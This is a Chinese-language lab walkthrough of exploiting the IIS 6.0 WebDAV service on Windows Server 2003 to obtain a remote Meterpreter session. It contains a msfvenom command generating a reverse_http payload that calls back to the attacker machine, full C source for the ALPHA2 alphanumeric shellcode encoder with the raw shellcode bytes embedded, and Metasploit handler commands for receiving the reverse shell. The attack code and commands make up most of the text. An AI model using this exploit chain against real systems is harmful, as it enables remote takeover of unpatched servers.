環境:
Kali攻擊機1 IP:192.168.114.140
Win7攻擊機2 IP(安裝gcc和python2.7):192.168.114.130
Windows server 2003目標主機(開啓webdev服務):192.168.114.132
在攻擊機1中的操作:
使用msfvenom生成shellcode :
msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c
在攻擊機2中的操作:
創建一個文本文件,將以下代碼拷貝進去,並修改成.c後綴名的任意命名文件(代碼參照:https://bbs.ichunqiu.com/thread-21294-1-1.html 由於encode.c編譯有誤,下面是經過我修改和翻譯後的encode.c,這個Alpha2是Linux下的源碼源Appha2地址是:http://skypher.com/wiki/index.php/ALPHA2):
// Alpha2.cpp : Defines the entry point for the console application.
//
#include <stdio.h> // printf(), fprintf(), stderr
#include <stdlib.h> // exit(), EXIT_SUCCESS, EXIT_FAILURE, srand(), rand()
#include <string.h> // strcasecmp(), strstr()
#include <time.h> //struct timeval, struct timezone, gettimeofday()
#include <winsock.h>
#define VERSION_STRING "ALPHA 2: Zero-tolerance. (build 07)"
#define COPYRIGHT "Copyright (C) 2003, 2004 by Berend-Jan Wever."
/*
________________________________________________________________________________
,sSSs,,s, ,sSSSs, ALPHA 2: Zero-tolerance.
SS" Y$P" SY" ,SY
iS' dY ,sS" Unicode-proof uppercase alphanumeric shellcode encoding.
YS, dSb ,sY" Copyright (C) 2003, 2004 by Berend-Jan Wever.
'"YSS'"S' 'SSSSSSSP <[email protected]>
________________________________________________________________________________
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
A copy of the GNU General Public License can be found at:
http://www.gnu.org/licenses/gpl.html
or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston, MA 02111-1307
USA.
Acknowledgements:
Thanks to rix for his phrack article on aphanumeric shellcode.
Thanks to obscou for his phrack article on unicode-proof shellcode.
Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.
*/
#define mixedcase_w32sehgetpc "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089"
#define uppercase_w32sehgetpc "VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A63861816"
#define mixedcase_ascii_decoder_body "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
#define uppercase_ascii_decoder_body "VTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI"
#define mixedcase_unicode_decoder_body "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB"
#define uppercase_unicode_decoder_body "QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB"
struct decoder {
char* id; // id of option
char* code; // the decoder
} mixedcase_ascii_decoders[] = {
{ "nops", "IIIIIIIIIIIIIIIIII7" mixedcase_ascii_decoder_body },
{ "eax", "PYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "ecx", "IIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "edx", "JJJJJJJJJJJJJJJJJ7RY" mixedcase_ascii_decoder_body },
{ "ebx", "SYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "esp", "TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "ebp", "UYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "esi", "VYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "edi", "WYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLYIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-C]", "LLLLLLLLLLLLYIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-8]", "LLLLLLLLYIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-4]", "LLLL7YIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp]", "YIIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+4]", "YYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+8]", "YYYIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+C]", "YYYYIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+10]", "YYYYYIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+14]", "YYYYYYIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYYIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYYIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "seh", mixedcase_w32sehgetpc "IIIIIIIIIIIIIIIII7QZ" // ecx code
mixedcase_ascii_decoder_body },
{ NULL, NULL }
}, uppercase_ascii_decoders[] = {
{ "nops", "IIIIIIIIIIII" uppercase_ascii_decoder_body },
{ "eax", "PYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "ecx", "IIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "edx", "JJJJJJJJJJJRY" uppercase_ascii_decoder_body },
{ "ebx", "SYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "esp", "TYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "ebp", "UYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "esi", "VYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "edi", "WYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLYII7QZ" uppercase_ascii_decoder_body },
{ "[esp-C]", "LLLLLLLLLLLLYIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp-8]", "LLLLLLLLYIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp-4]", "LLLL7YIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp]", "YIIIIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+4]", "YYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp+8]", "YYYIIIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+C]", "YYYYIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp+10]", "YYYYYIIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+14]", "YYYYYYIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYYIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYYIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "seh", uppercase_w32sehgetpc "IIIIIIIIIIIQZ" // ecx code
uppercase_ascii_decoder_body },
{ NULL, NULL }
}, mixedcase_ascii_nocompress_decoders[] = {
{ "nops", "7777777777777777777777777777777777777" mixedcase_ascii_decoder_body },
{ "eax", "PY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "ecx", "77777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "edx", "77777777777777777777777777777777777RY" mixedcase_ascii_decoder_body },
{ "ebx", "SY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "esp", "TY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "ebp", "UY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "esi", "VY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "edi", "WY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLY777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-C]", "LLLLLLLLLLLLY7777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-8]", "LLLLLLLLY77777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-4]", "LLLL7Y77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp]", "Y7777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+4]", "YY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+8]", "YYY77777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+C]", "YYYY7777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+10]", "YYYYY777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+14]", "YYYYYY77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYY7777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYY777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "seh", mixedcase_w32sehgetpc "77777777777777777777777777777777777QZ" // ecx code
mixedcase_ascii_decoder_body },
{ NULL, NULL }
}, uppercase_ascii_nocompress_decoders[] = {
{ "nops", "777777777777777777777777" uppercase_ascii_decoder_body },
{ "eax", "PY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "ecx", "7777777777777777777777QZ" uppercase_ascii_decoder_body },
{ "edx", "7777777777777777777777RY" uppercase_ascii_decoder_body },
{ "ebx", "SY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "esp", "TY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "ebp", "UY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "esi", "VY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "edi", "WY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLY77777QZ" uppercase_ascii_decoder_body },
{ "[esp-C]", "LLLLLLLLLLLLY777777777QZ" uppercase_ascii_decoder_body },
{ "[esp-8]", "LLLLLLLLY7777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp-4]", "LLLL7Y7777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp]", "Y777777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+4]", "YY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+8]", "YYY7777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+C]", "YYYY777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+10]", "YYYYY77777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+14]", "YYYYYY7777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYY777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYY77777777777777QZ" uppercase_ascii_decoder_body },
{ "seh", uppercase_w32sehgetpc "7777777777777777777777QZ" // ecx code
uppercase_ascii_decoder_body },
{ NULL, NULL }
}, mixedcase_unicode_decoders[] = {
{ "nops", "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
{ "eax", "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "ecx", "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
{ "edx", "RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "ebx", "SSYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "esp", "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "ebp", "UUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "esi", "VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "edi", "WWYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "[esp]", "YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44" mixedcase_unicode_decoder_body },
{ "[esp+4]", "YUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ NULL, NULL }
}, uppercase_unicode_decoders[] = {
{ "nops", "IAIAIAIA4444" uppercase_unicode_decoder_body },
{ "eax", "PPYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "ecx", "IAIAIAIA4444" uppercase_unicode_decoder_body },
{ "edx", "RRYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "ebx", "SSYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "esp", "TUYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "ebp", "UUYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "esi", "VVYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "edi", "WWYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "[esp]", "YAIAIAIAIA44" uppercase_unicode_decoder_body },
{ "[esp+4]", "YUYAIAIAIAIA" uppercase_unicode_decoder_body },
{ NULL, NULL }
}, mixedcase_unicode_nocompress_decoders[] = {
{ "nops", "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "eax", "PPYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "ecx", "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "edx", "RRYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "ebx", "SSYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "esp", "TUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "ebp", "UUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "esi", "VVYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "edi", "WWYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "[esp]", "YA4444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "[esp+4]", "YUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ NULL, NULL }
}, uppercase_unicode_nocompress_decoders[] = {
{ "nops", "44444444444444" uppercase_unicode_decoder_body },
{ "eax", "PPYA4444444444" uppercase_unicode_decoder_body },
{ "ecx", "44444444444444" uppercase_unicode_decoder_body },
{ "edx", "RRYA4444444444" uppercase_unicode_decoder_body },
{ "ebx", "SSYA4444444444" uppercase_unicode_decoder_body },
{ "esp", "TUYA4444444444" uppercase_unicode_decoder_body },
{ "ebp", "UUYA4444444444" uppercase_unicode_decoder_body },
{ "esi", "VVYA4444444444" uppercase_unicode_decoder_body },
{ "edi", "WWYA4444444444" uppercase_unicode_decoder_body },
{ "[esp]", "YA444444444444" uppercase_unicode_decoder_body },
{ "[esp+4]", "YUYA4444444444" uppercase_unicode_decoder_body },
{ NULL, NULL }
};
struct decoder* decoders[] = {
mixedcase_ascii_decoders, uppercase_ascii_decoders,
mixedcase_unicode_decoders, uppercase_unicode_decoders,
mixedcase_ascii_nocompress_decoders, uppercase_ascii_nocompress_decoders,
mixedcase_unicode_nocompress_decoders, uppercase_unicode_nocompress_decoders
};
//evil你自己的shllcode,用的話需修改源碼
//這裏寫入msf生成的shellcode
char evil[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\x68\x3a\x56"
"\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53\x68\xb3\x15\x00\x00"
"\xe8\x75\x01\x00\x00\x2f\x37\x49\x69\x45\x65\x57\x69\x66\x79"
"\x4f\x59\x71\x7a\x69\x76\x50\x63\x38\x64\x66\x41\x67\x50\x79"
"\x33\x6e\x54\x49\x71\x4b\x42\x44\x46\x37\x2d\x4d\x53\x66\x5a"
"\x71\x57\x4c\x57\x4b\x58\x70\x6d\x4c\x56\x75\x6b\x50\x6e\x34"
"\x5f\x4f\x4f\x69\x31\x4b\x6d\x59\x6c\x5f\x57\x6b\x61\x36\x59"
"\x78\x41\x46\x5a\x76\x6c\x58\x6b\x63\x50\x6f\x53\x53\x57\x71"
"\x5f\x58\x48\x77\x41\x4c\x69\x30\x57\x65\x41\x78\x64\x45\x59"
"\x64\x77\x76\x31\x64\x32\x67\x58\x34\x7a\x50\x56\x39\x63\x71"
"\x37\x6d\x39\x50\x36\x74\x5a\x77\x39\x32\x36\x57\x30\x53\x58"
"\x49\x66\x44\x59\x58\x57\x49\x74\x4d\x4f\x47\x36\x6c\x5a\x51"
"\x65\x38\x44\x69\x7a\x34\x75\x37\x6c\x4d\x4c\x4e\x44\x5a\x6b"
"\x74\x47\x42\x72\x4d\x76\x38\x4f\x64\x58\x64\x46\x32\x50\x70"
"\x7a\x4d\x46\x75\x74\x35\x43\x32\x33\x63\x50\x33\x6a\x46\x62"
"\x4e\x4e\x79\x4b\x38\x72\x31\x79\x4d\x4b\x56\x51\x63\x70\x67"
"\x63\x34\x57\x73\x68\x4f\x57\x65\x4a\x38\x55\x31\x71\x36\x73"
"\x68\x2d\x33\x43\x53\x4d\x6f\x79\x67\x70\x55\x52\x57\x2d\x4c"
"\x56\x68\x73\x70\x4a\x62\x2d\x35\x6a\x4f\x2d\x41\x45\x4d\x00"
"\x50\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53\x68\x00\x02\x60"
"\x84\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e\x3b\xff\xd5\x96"
"\x6a\x0a\x5f\x53\x53\x53\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5"
"\x85\xc0\x75\x14\x68\x88\x13\x00\x00\x68\x44\xf0\x35\xe0\xff"
"\xd5\x4f\x75\xe1\xe8\x4c\x00\x00\x00\x6a\x40\x68\x00\x10\x00"
"\x00\x68\x00\x00\x40\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93"
"\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96"
"\x89\xe2\xff\xd5\x85\xc0\x74\xcf\x8b\x07\x01\xc3\x85\xc0\x75"
"\xe5\x58\xc3\x5f\xe8\x7f\xff\xff\xff\x31\x39\x32\x2e\x31\x36"
"\x38\x2e\x31\x31\x34\x2e\x31\x34\x30\x00\xbb\xf0\xb5\xa2\x56"
"\x6a\x00\x53\xff\xd5";
void version(void) {
printf(
"________________________________________________________________________________\n"
"\n"
" ,sSSs,,s, ,sSSSs, " VERSION_STRING "\n"
" SS/' Y$P/' SY/' ,SY \n"
" iS' dY ,sS/' Unicode-proof uppercase alphanumeric shellcode encoding.\n"
" YS, dSb ,sY/' " COPYRIGHT "\n"
" '/'YSS'/'S' 'SSSSSSSP <[email protected]>\n"
"________________________________________________________________________________\n"
"\n"
);
exit(EXIT_SUCCESS);
}
void help(char* name)
{
printf(
"\n"
" 使用方法: %s [OPTION] [BASEADDRESS]\n"
"\n"
" ALPHA 2編碼您的IA-32 shellcode僅包含字母數字字符,結果可以是隻有大寫字母和寫字母和(或)unicode的證明,它是您的原始shellcode的編碼版本,由一些填充的baseaddress代碼組成,解碼器程序和編碼的原始shellcode,這將適用於任何目標操作系統,所得到的shellcode需要具有RWE訪問權限,以修改自己的代碼並解碼存儲器中的原始shellcode.\n"
"\n"
"BASEADDRESS\n"
" 解碼器常需要在指定的寄存器中具有基地址.baseaddress代碼將baseaddress從給定的寄存器或堆棧位置複製到適當的寄存器中.\n"
"eax, ecx, edx, ecx, esp, ebp, esi, edi\n"
" 從給定的寄存器中取出baseaddress.(使用esp的Unicode baseaddress代碼將覆蓋由ebp指向的內存的字節!)\n"
"[esp], [esp-X], [esp+X]\n"
" 從堆棧中取出baseaddress\n"
"seh\n"
" Windows的結構化異常處理程序(seh)可以用於在win32系統上自動計算baseaddress.此選項不適用於unicode-proof shellcode,大寫版本不是100 %%可靠.\n"
"nops\n"
" 沒有baseaddress代碼,只是填充. 如果您需要從源代碼中獲取baseaddress,請使用此選項(結合--nocompress),並使用自己的代碼替換nops. ascii解碼器需要在寄存器ecx和edx中的基地址,僅在ecx中的unicode-proof解碼器.\n"
"\n"
"-n\n"
" 不輸出一個換行後的shellcode.\n"
"--nocompress\n"
" baseaddress代碼使用'dec'指令來降低所需的填充長度. 因此,unicode-proof代碼會覆蓋shellcode前面的一些字節. 如果不想使用'dec',請使用此選項.\n"
"--unicode\n"
" 把shellcode unicode-proof.這意味着當它被轉換爲Unicode(在每一個字節中插入一個'0')才被執行.\n"
"--uppercase\n"
" 將shellcode全部轉換成大寫字符,使用更多的字節然後混合shellcode\n"
"--sources\n"
" 爲給定的組合--uppercase和--unicode輸出一串基地址(BASEADDRESS)選項\n"
"--help\n"
" 顯示幫助和退出\n"
"--version\n"
" 輸出版本信息和退出\n"
"\n"
" 請查看源文件獲取更多細節和複製條件,該軟件不受保護,不用作商業及特定用途\n"
"\n"
"致謝:\n"
" Thanks to rix for his phrack article on aphanumeric shellcode.\n"
" Thanks to obscou for his phrack article on unicode-proof shellcode.\n"
" Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.\n"
"\n"
" 報告bugs:<[email protected]>\n",
name
);
exit(EXIT_SUCCESS);
}
//-----------------------------------------------------------------------------
int main(int argc, char* argv[], char* envp[])
{
int uppercase = 0, unicode = 0, sources = 0, w32sehgetpc = 0,
nonewline = 0, nocompress = 0, options = 0, spaces = 0;
char* baseaddress = NULL;
int i, input, A, B, C, D, E, F;
char* valid_chars;
int j=0;
//Random seed
//struct timeval tv;
//struct timezone tz;
//ttimeofday(&tv, &tz);
//srand((int)tv.tv_sec*1000+tv.tv_usec);
// Scan all the options and set internal variables accordingly
for (i=1; i<argc; i++)
{
if (strcmp(argv[i], "--help") == 0) help(argv[0]);
else if (strcmp(argv[i], "--version") == 0) version();
else if (strcmp(argv[i], "--uppercase") == 0) uppercase = 1;
else if (strcmp(argv[i], "--unicode") == 0) unicode = 1;
else if (strcmp(argv[i], "--nocompress") == 0) nocompress = 1;
else if (strcmp(argv[i], "--sources") == 0) sources = 1;
else if (strcmp(argv[i], "--spaces") == 0) spaces = 1;
else if (strcmp(argv[i], "-n") == 0) nonewline = 1;
else if (baseaddress == NULL) baseaddress = argv[i];
else
{
fprintf(stderr, "%s: 不止一個BASEADDRESS option: '%s' 和 '%s'\n"
"使用 '%s --help' 獲取更多信息.\n",
argv[0], baseaddress, argv[i], argv[0]);
exit(EXIT_FAILURE);
}
}
// No baseaddress option ?
if (baseaddress == NULL)
{
fprintf(stderr, "%s: 缺少 BASEADDRESS 選項.\n"
"使用 '%s --help' 獲取更多信息.\n", argv[0], argv[0]);
exit(EXIT_FAILURE);
}
// The uppercase, unicode and nocompress option determine which decoder we'll
// need to use. For each combination of these options there is an array,
// indexed by the baseaddress with decoders. Pointers to these arrays have
// been put in another array, we can calculate the index into this second
// array like this:
options = uppercase+unicode*2+nocompress*4;
// decoders[options] will now point to an array of decoders for the specified
// options. The array contains one decoder for every possible baseaddress.
// Someone wants to know which baseaddress options the specified options
// for uppercase, unicode and/or nocompress allow:
if (sources)
{
printf("可用的選項 %s%s 包括文字數字的shellcode:\n",
uppercase ? "uppercase" : "mixedcase",
unicode ? " unicode-proof" : "");
for (i=0; decoders[options][i].id != NULL; i++)
{
printf(" %s\n", decoders[options][i].id);
}
printf("\n");
exit(EXIT_SUCCESS);
}
//TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI
if (uppercase)
{
if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";
else valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";
} else
{
if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
else valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
}
// Find and output decoder
for (i=0; stricmp(baseaddress, decoders[options][i].id) != 0; i++)
{
if (decoders[options][i+1].id == NULL)
{
fprintf(stderr, "%s: 無法識別的BASEADDRESS選項 ‘%s'\n"
"使用 '%s %s%s--sources' 獲取一串 BASEADDRESS 選項.\n",
argv[0], baseaddress, argv[0],
uppercase ? "--uppercase " : "",
unicode ? "--unicode " : "");
exit(EXIT_FAILURE);
}
}
printf("%s", decoders[options][i].code);
//system("pause");
// read, encode and output shellcode
for (j; j<sizeof(evil);j++)
{
input=evil[j];
// encoding AB -> CD 00 EF 00
A = (input & 0xf0) >> 4;
B = (input & 0x0f);
F = B;
// E is arbitrary as long as EF is a valid character
i = rand() % strlen(valid_chars);
while ((valid_chars[i] & 0x0f) != F) { i = ++i % strlen(valid_chars); }
E = valid_chars[i] >> 4;
// normal code uses xor, unicode-proof uses ADD.
// AB ->
D = unicode ? (A-E) & 0x0f : (A^E);
// C is arbitrary as long as CD is a valid character
i = rand() % strlen(valid_chars);
while ((valid_chars[i] & 0x0f) != D)
{
i = ++i % strlen(valid_chars);
}
C = valid_chars[i] >> 4;
printf("%c%c", (C<<4)+D, (E<<4)+F);
}
//最後顯示出的一串字符就是編碼後的shellcode
//可以這樣使用命令行下:alpha2 esp
//esp指向了shellcode
printf("A%s", nonewline ? "" : "\n"); // Terminating "A"
exit(EXIT_SUCCESS);
}
複製剛剛用msfvenom命令所生成的shellcode到.c文件中的如下位置:
由於kali中的gcc編譯出錯,提示缺少頭文件,我在攻擊機2中使用gcc編譯:
最後生成exe文件
在cmd下使用:
使用--help獲取幫助
使用--upercase--unicode ESI
修改原poc(地址:https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py):
回到攻擊機1:
在Kali中打開msf做監聽:
useexploit/multi/handler
setpayload windows/meterpreter/reverse_http
setLHOST 192.168.114.140
setLPORT 5555
exploit-j 在計劃任務下進行滲透攻擊(攻擊將在後臺進行)
再回到攻擊機2:
執行修改後的python腳本
執行後會回連Kali攻擊機 192.168.114.140的5555端口:
最後可以結合metasploit終端命令進一步操作:
參考地址:http://blog.csdn.net/mickeymouse1928/article/details/71107769